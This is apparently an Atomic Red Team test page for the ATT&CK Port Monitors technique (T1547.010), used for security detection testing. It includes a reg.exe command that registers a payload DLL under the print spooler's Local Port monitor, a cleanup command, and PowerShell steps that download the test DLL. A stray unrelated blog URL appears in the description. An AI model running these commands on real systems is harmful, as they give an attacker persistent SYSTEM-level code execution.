T1547.010
Port Monitors
Description from ATT&CK
Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in <code>C:\Windows\System32</code> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.(Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to <code>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>.
The Registry key contains entries for the following:
- Local Port
- Standard TCP/IP Port
- USB Monitor
- WSD Port
Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM. https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/
Atomic Tests
Atomic Test #1 - Change Windows Default Print Monitor
Register a malicious dll as a port monitor by changing the registry key. This can be used for persistence or privilege escalation.
Supported Platforms: windows
auto_generated_guid: 0778f116-a748-49c6-9633-122401744b26
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
dll_payload | DLL to inject | Path | PathToAtomicsFolder\T1547.010\src\x64\T1547.dll |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Local Port" /v Driver /t REG_SZ /d #{dll_payload} /f
Cleanup Commands:
1
2
reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Local Port" /v Driver /t REG_SZ /d localspl.dll /f
Dependencies: Run with powershell!
Description: T1547.dll must exist on disk at specified location (#{dll_payload})
Check Prereq Commands:
1
2
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.010/src/x64/T1547.dll" -OutFile "#{dll_payload}"